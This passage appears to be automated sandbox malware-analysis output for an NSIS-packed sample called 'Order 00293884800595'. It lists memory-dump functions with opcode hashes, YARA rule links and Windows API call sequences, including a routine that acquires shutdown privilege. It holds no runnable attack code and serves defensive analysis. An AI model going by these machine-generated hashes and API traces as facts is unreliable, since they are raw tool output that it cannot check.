Instruction Fuzzy Hash: 0F21A1B0E24241AFDF16DB78C8847593B66E787313F004965D806DF269E734DC4ACB95

Function 001516C8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66e079921f01fff7a15fb3283d90e25724f76a215cf84447aa569f205d8500f2
Instruction ID: 5cbcbd4c24b97b5c2a999b97ea422ce7618c70c672c2066b34c125fd92c46b05
Opcode Fuzzy Hash: 66e079921f01fff7a15fb3283d90e25724f76a215cf84447aa569f205d8500f2
Instruction Fuzzy Hash: 46218330B00205DFDB15DB78C5557AD3BF1AB4A342F100569D411EF2A0DB368D49CB61

Function 00154DD2 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd9cf946b1686c139aa0b37d411a884081d5630cfb7e8d1c7cb313a74c36fbe3
Instruction ID: 0c35caf69ca1a6105354b20d5dba830a2712fb8129d87f18ab53f6c33e1a4b18
Opcode Fuzzy Hash: bd9cf946b1686c139aa0b37d411a884081d5630cfb7e8d1c7cb313a74c36fbe3
Instruction Fuzzy Hash: 3D214D34A00205CFDB14DB78C959AAE7BF1FF49305F1005A9E816EB3A1DB398D49CB51

Function 000AD030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807103983733.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ad000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dff3f001384cd7cf65d1c89fa5131fe2473d5a9034a772b7ec1b1454da57918
Instruction ID: 1a5306490a9a9a83ee113b8d02038082c2932f96c34daa9f84ebc8f5598c305c
Opcode Fuzzy Hash: 1dff3f001384cd7cf65d1c89fa5131fe2473d5a9034a772b7ec1b1454da57918
Instruction Fuzzy Hash: 7E2122B0604240DFDB20DF94D980F26BBA1EB85314F24C56AE84A0B642C33BD846CA62

Function 00157EB0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cde4f8a3a0e60fd1c58c76a65412c4667c99065e6cf76c5c6ab65af531e5fc2
Instruction ID: 1cc1a95f6fff56da71626abf03e3073b3bdb6ffe29cd0183aaefbe0981c4e685
Opcode Fuzzy Hash: 6cde4f8a3a0e60fd1c58c76a65412c4667c99065e6cf76c5c6ab65af531e5fc2
Instruction Fuzzy Hash: 1D214130E04206DBCB09CFA5E45569EB7B6AF89301F20852AEC25FB390DB719C498B50

Function 001516D8 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b40000c48e17f9158bf77dc2763c71593cb73b3501f0fd66d8cc4e97ec97bd0f
Instruction ID: bb37b9bdbb9973403ea7d22a3142f5bc71ac0c100431ccfae428dc91e4f81cfc
Opcode Fuzzy Hash: b40000c48e17f9158bf77dc2763c71593cb73b3501f0fd66d8cc4e97ec97bd0f
Instruction Fuzzy Hash: C8214A30B00205DFDB19DB78C5157AE7BF2AB4A342F200469D916EF2A0DB768D09CBA1

Function 00151500 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23615b48ae8b6136421d1bb169e1cd696f68d2c481da0979d2cd390e3f7e010f
Instruction ID: 0d1b140673affbcda537b3c2546cc63df76cbe2648287406e3906500bc35df4f
Opcode Fuzzy Hash: 23615b48ae8b6136421d1bb169e1cd696f68d2c481da0979d2cd390e3f7e010f
Instruction Fuzzy Hash: 8321C0B0E20101ABDF26DB68C4847593766E786313F004964D817DB258FB34DC4ACB85

Function 35FB2C10 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3140c13c100fc91e4596f1bf243af9270871eb3aa5c99d7b79c366b319fdb7a
Instruction ID: a18d53adf0bfbfcae1a1bfabe271c73b219eb55fcc4bf36e41e4bf769e80bfde
Opcode Fuzzy Hash: e3140c13c100fc91e4596f1bf243af9270871eb3aa5c99d7b79c366b319fdb7a
Instruction Fuzzy Hash: F6218475B10115DBDF08DA6AD450B9EB7B7EB84360F148829E409EB344DB71ED428BC4

Function 00154DE0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1c42e186aa7ebf38d50803db02bceb7993654e316466ac5d6769a2b00b00160
Instruction ID: e6841a3272f9534a2fd783dc471583e05af50f5b4b660a898bb07ee105f8d6ec
Opcode Fuzzy Hash: f1c42e186aa7ebf38d50803db02bceb7993654e316466ac5d6769a2b00b00160
Instruction Fuzzy Hash: 6B210730A00104CFDB14EB78C959BAE77F1FB49305F100568E816EB3A1EB399D458B51

Function 00151450 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6b7ba28ebbac893939fa37f0347a07d20f0c6820ba8b0b7a59af161a216f537
Instruction ID: 4c02da4ac03aa41ad63abca9b32782572eb7763cdc4b1376bd8afe2456e76116
Opcode Fuzzy Hash: b6b7ba28ebbac893939fa37f0347a07d20f0c6820ba8b0b7a59af161a216f537
Instruction Fuzzy Hash: B6119130E00254DFCF22AFB984952AD7BF5EF89312B1804B9D894DB202E735C94AC791

Function 35FB0150 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d72c1f30ca553973eb4b002540b591c46ab1e29877f3f36f96b60cbe642b6bec
Instruction ID: 12ac64c5269a47e49d46d8c32128e618e62fbeb1570886f3a2b97c6dfd1fa68b
Opcode Fuzzy Hash: d72c1f30ca553973eb4b002540b591c46ab1e29877f3f36f96b60cbe642b6bec
Instruction Fuzzy Hash: 571152357046198FDF08DA79DC14A9F73AAEBC9750F018536D405E7340EF65DC068B95

Function 35FB0388 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2f563457df33ad83aaa941378991d135d91274e0b1f1c9414d1ffa94ac20947
Instruction ID: cecb9a16ac1f6dfec0d87a02326a1ec5461572f2f980005bbc400a8e12d97bcb
Opcode Fuzzy Hash: e2f563457df33ad83aaa941378991d135d91274e0b1f1c9414d1ffa94ac20947
Instruction Fuzzy Hash: B201F1357041045BEB14C27D9864B1EBBDAEBCA310F148C3AE10AC7345DE65DC024391

Function 00151611 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f90488de3d33985fab5c6b0f966be560ccf2fb65dfe576a796fac942f8ad2014
Instruction ID: 28f9e85c0227c00e95e9c8b3a08352b27d6b0628628ad90e8d686c52fb9d1aaa
Opcode Fuzzy Hash: f90488de3d33985fab5c6b0f966be560ccf2fb65dfe576a796fac942f8ad2014
Instruction Fuzzy Hash: 7A112171F00206AFDF11AFB89C0876E3FB5EB8A351F140126E809E7340EB35C8068B86

Function 00156244 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6b10c5bb456748b5d488fd32459918b6ba5089ec0f85cd5511b0734bd2b0d41
Instruction ID: 779ad3cb5bc5d51a42b044e80dbd58b0fa07b790901dabefd60a7d92374eb07c
Opcode Fuzzy Hash: f6b10c5bb456748b5d488fd32459918b6ba5089ec0f85cd5511b0734bd2b0d41
Instruction Fuzzy Hash: 8221C3B1D01619AFCB00DF9AD984A9EFBB4FB49710F50812AE918B7200D374A955CBA5

Function 35FBACC0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac9c273567e941aafcd6549fbd9cbf4e96c1f42da6d02d87ecd7683b5a6c99af
Instruction ID: e159b641e732c86ef71f2aa93fbf4eb459b98c6ad06caed01f0635105f53d740
Opcode Fuzzy Hash: ac9c273567e941aafcd6549fbd9cbf4e96c1f42da6d02d87ecd7683b5a6c99af
Instruction Fuzzy Hash: 4701F235B002005BDB0596799460B1F67DBEB8E721F14897AE94ECB349DE24CC038384

Function 000AD02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807103983733.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ad000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08e9da1bfee975e41a947f9fd3b761d780fadb6920dde41b5b9a6d173606086a
Instruction ID: 0de1b4fef3dfd476a3e180c929bc3f0faad001b89b00bbbfc82d3f7e22d16828
Opcode Fuzzy Hash: 08e9da1bfee975e41a947f9fd3b761d780fadb6920dde41b5b9a6d173606086a
Instruction Fuzzy Hash: 72118B75604280DFDB11CF54D584B15FBA2FB85314F28C6AED84A4BA56C33AD84ACB62

Function 00151460 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a2b01ed0c7c0f75933c85321e40e7a25229c62c85d2724a6914f76360182edc
Instruction ID: d6f0df2d1e67e3ed8a2377359f44916ad2985305f01910e482a8d13a5a6e5a0d
Opcode Fuzzy Hash: 1a2b01ed0c7c0f75933c85321e40e7a25229c62c85d2724a6914f76360182edc
Instruction Fuzzy Hash: 19016D31E00214DFCF22EFB884416AE7BE5AF48316B14047AD815EB201EB35DC458B91

Function 0015FD18 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb7c9be49d5ca61525b180a4aa86cafdc5421bb281b198848bd9ffe36979379f
Instruction ID: e45fa04557d17577e3d80bd7657b5b65bb8e6d799011a990c23f773c721f253b
Opcode Fuzzy Hash: cb7c9be49d5ca61525b180a4aa86cafdc5421bb281b198848bd9ffe36979379f
Instruction Fuzzy Hash: BE21C0B1D01659AFCB00CF9AD984ADEFFB4BF49710F50812AE918A7200C3786954CBA5

Function 35FB0398 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bcd5bdabceb44ed846cbeaf23f08140d7c2d5e2193c60924377e86e91431338
Instruction ID: 6a86c78df2f9a755cc7c6c794e2be0153eaf665c9f1fc152a98401ab0dad39a8
Opcode Fuzzy Hash: 0bcd5bdabceb44ed846cbeaf23f08140d7c2d5e2193c60924377e86e91431338
Instruction Fuzzy Hash: 1B01A935B040149BEB18D6BE9458B1EB6CFEBCA720F248839E10ACB344DEA5DC024395

Function 00150AFC Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807104601727.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_150000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5af708719497be3d69566d1f27e8a6269e03773bc428c7e801cf92244f67781c
Instruction ID: f0f312492b5f2c854e72d5a2b79907888a44a08554eff17d1be0e5e5d6e627d0
Opcode Fuzzy Hash: 5af708719497be3d69566d1f27e8a6269e03773bc428c7e801cf92244f67781c
Instruction Fuzzy Hash: 3701D63168C163DAEB2780D544A127933605B7532FB96407AD86CDF48BE300C94DC3A2

Function 35FBACD0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc6c8d61c17df20c183e48d36d751a18221b0512e9fc75e403d827c64cc09f89
Instruction ID: 1ffb33ba87ecd945834159257c57ddd8ea90c6e7e169dcd05084b8c83d440efc
Opcode Fuzzy Hash: dc6c8d61c17df20c183e48d36d751a18221b0512e9fc75e403d827c64cc09f89
Instruction Fuzzy Hash: FA016935B001145BEB189A7E94A4B1F77DAEBCD761F108939E94ACB348DE65DC034385

Function 35FBB98A Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e699d919e53f38179b8c6649b7f1db7848f878781b3d2628b573f8d822d085ef
Instruction ID: 0b1afe7bad81e070622d3eeba5906faf82675eb8d93cb0c4ba3e679b65811d1e
Opcode Fuzzy Hash: e699d919e53f38179b8c6649b7f1db7848f878781b3d2628b573f8d822d085ef
Instruction Fuzzy Hash: 6C014639B0025A8FEB12527AD51164E33D7EFC2361F000CBAE046DB349DB61DC478391

Function 35FB8708 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 799651d2e84a8299ef9b14d126d2438daaddb8e727450ad384df670304df40a7
Instruction ID: e51464785c17de80ff10b87049bfcc7644a08630b40210819123c13f4db72aa9
Opcode Fuzzy Hash: 799651d2e84a8299ef9b14d126d2438daaddb8e727450ad384df670304df40a7
Instruction Fuzzy Hash: ECF0A03AE10228D7EB149976E8419CBB77AF784751F104839ED11F7244DBB1A8058BD0

Non-executed Functions

Function 004033D8 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 430stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008001), ref: 004033FB
GetVersionExA.KERNEL32(?), ref: 00403424
GetVersionExA.KERNEL32(0000009C), ref: 0040343B
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
#17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403541
OleInitialize.OLE32(00000000), ref: 00403548
SHGetFileInfoA.SHELL32(00429448,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403566
GetCommandLineA.KERNEL32(0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
CharNextA.USER32(00000000,00435000,00000020,00435000,00000000,?,00000008,0000000A,0000000C), ref: 004035B5
GetTempPathA.KERNEL32(00000400,00436400,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004036AE
GetWindowsDirectoryA.KERNEL32(00436400,000003FB,?,00000008,0000000A,0000000C), ref: 004036BF
lstrcatA.KERNEL32(00436400,\Temp,?,00000008,0000000A,0000000C), ref: 004036CB
GetTempPathA.KERNEL32(000003FC,00436400,00436400,\Temp,?,00000008,0000000A,0000000C), ref: 004036DF
lstrcatA.KERNEL32(00436400,Low,?,00000008,0000000A,0000000C), ref: 004036E7
SetEnvironmentVariableA.KERNEL32(TEMP,00436400,00436400,Low,?,00000008,0000000A,0000000C), ref: 004036F8
SetEnvironmentVariableA.KERNEL32(TMP,00436400,?,00000008,0000000A,0000000C), ref: 00403700
DeleteFileA.KERNEL32(00436000,?,00000008,0000000A,0000000C), ref: 00403714
OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 004037BF
ExitProcess.KERNEL32 ref: 004037E0
lstrlenA.KERNEL32(00436400,00435000,00000000,?,?,00000008,0000000A,0000000C), ref: 004037EF
wsprintfA.USER32 ref: 00403846
GetFileAttributesA.KERNEL32(00431400,00436400,00431400,?,0000000C), ref: 00403878
DeleteFileA.KERNEL32(00431400), ref: 00403884
SetCurrentDirectoryA.KERNEL32(00436400,00436400,00431400,?,0000000C), ref: 004038B0
CopyFileA.KERNEL32(00436C00,00431400,00000001), ref: 004038C6
CloseHandle.KERNEL32(00000000,00431800,00431800,?,00431400,00000000), ref: 00403919
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403936
OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
ExitProcess.KERNEL32 ref: 004039B6

Strings

", xrefs: 004035D8
TMP, xrefs: 004036FB
Error launching installer, xrefs: 00403778
\Temp, xrefs: 004036C5
A, xrefs: 00403476
`K@v, xrefs: 004036EC
~nsu%X.tmp, xrefs: 0040383E
UXTHEME, xrefs: 004034F8, 004034FD, 00403503
SeShutdownPrivilege, xrefs: 0040394B
TEMP, xrefs: 004036F3
NSIS Error, xrefs: 0040356C
Low, xrefs: 004036E1

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
String ID: "$A$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K@v$~nsu%X.tmp
API String ID: 2956269667-3096171558
Opcode ID: e13c508dadc9a019ad899f483bcab1bf5121664e56d1959915504f3b46ceb96e
Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
Opcode Fuzzy Hash: e13c508dadc9a019ad899f483bcab1bf5121664e56d1959915504f3b46ceb96e
Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E

Function 00405A4F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,763F3410,00436400,00435000), ref: 00405A78
lstrcatA.KERNEL32(0042B490,\*.*,0042B490,?,?,763F3410,00436400,00435000), ref: 00405AC0
lstrcatA.KERNEL32(?,0040A014,?,0042B490,?,?,763F3410,00436400,00435000), ref: 00405AE1
lstrlenA.KERNEL32(?,?,0040A014,?,0042B490,?,?,763F3410,00436400,00435000), ref: 00405AE7
FindFirstFileA.KERNEL32(0042B490,?,?,?,0040A014,?,0042B490,?,?,763F3410,00436400,00435000), ref: 00405AF8
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
FindClose.KERNEL32(00000000), ref: 00405BB6

Strings

\*.*, xrefs: 00405ABA

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: fd14e2a26b3c5305760fc07f32de27d450e580bd3a69afa393f06f0700e9f7c9
Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
Opcode Fuzzy Hash: fd14e2a26b3c5305760fc07f32de27d450e580bd3a69afa393f06f0700e9f7c9
Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE

Function 35FB35A0 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$~q, xrefs: 35FB3B02
$~q, xrefs: 35FB3A59
$~q, xrefs: 35FB369C
$~q, xrefs: 35FB36C1
$~q, xrefs: 35FB3AF8
$~q, xrefs: 35FB3A4D
$~q, xrefs: 35FB3B0E
$~q, xrefs: 35FB3690
$~q, xrefs: 35FB36CD
$~q, xrefs: 35FB3AEC

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID: $~q$$~q$$~q$$~q$$~q$$~q$$~q$$~q$$~q$$~q
API String ID: 0-3831391056
Opcode ID: 348f0a3195ec1f61bd4c2a151a414b6b67cfc7365e4cc1ac1b25e72203be64a5
Instruction ID: ad6b019ca586277b371f1e4d590a9cce0e7fe928672c95d76f9d34fb5194700c
Opcode Fuzzy Hash: 348f0a3195ec1f61bd4c2a151a414b6b67cfc7365e4cc1ac1b25e72203be64a5
Instruction Fuzzy Hash: 2F122C74A04619CFDF14DFA9C854A9DB7F2BF89300F2089A9D406AB395DBB09D45CF81

Function 00404D32 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404D49
GetDlgItem.USER32(?,00000408), ref: 00404D56
GlobalAlloc.KERNEL32(00000040,?), ref: 00404DA5
LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
SetWindowLongA.USER32(?,000000FC,00405345), ref: 00404DD6
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DE8
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404E2E
DeleteObject.GDI32(00000110), ref: 00404E33
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34

Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404545), ref: 00404370

SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
GetWindowLongA.USER32(?,000000F0), ref: 00404F76
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F84
ShowWindow.USER32(?,00000005), ref: 00404F94
SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405109
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040512D
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
ImageList_Destroy.COMCTL32(?), ref: 00405162
GlobalFree.KERNEL32(?), ref: 00405172
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
SendMessageA.USER32(?,00001102,?,?), ref: 00405294
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
InvalidateRect.USER32(?,00000000,00000001), ref: 004052CE
ShowWindow.USER32(?,00000000), ref: 0040531C
GetDlgItem.USER32(?,000003FE), ref: 00405327
ShowWindow.USER32(00000000), ref: 0040532E

Strings

N, xrefs: 00404FCD
M, xrefs: 00404EEC
, xrefs: 00405306

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: c4a55ea5c543b5086f26064fedb30d068b786e8e21ddca1fa1d8d22dd1bc26e7
Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
Opcode Fuzzy Hash: c4a55ea5c543b5086f26064fedb30d068b786e8e21ddca1fa1d8d22dd1bc26e7
Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58

Function 0040550F Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 0040556E
GetDlgItem.USER32(?,000003EE), ref: 0040557D
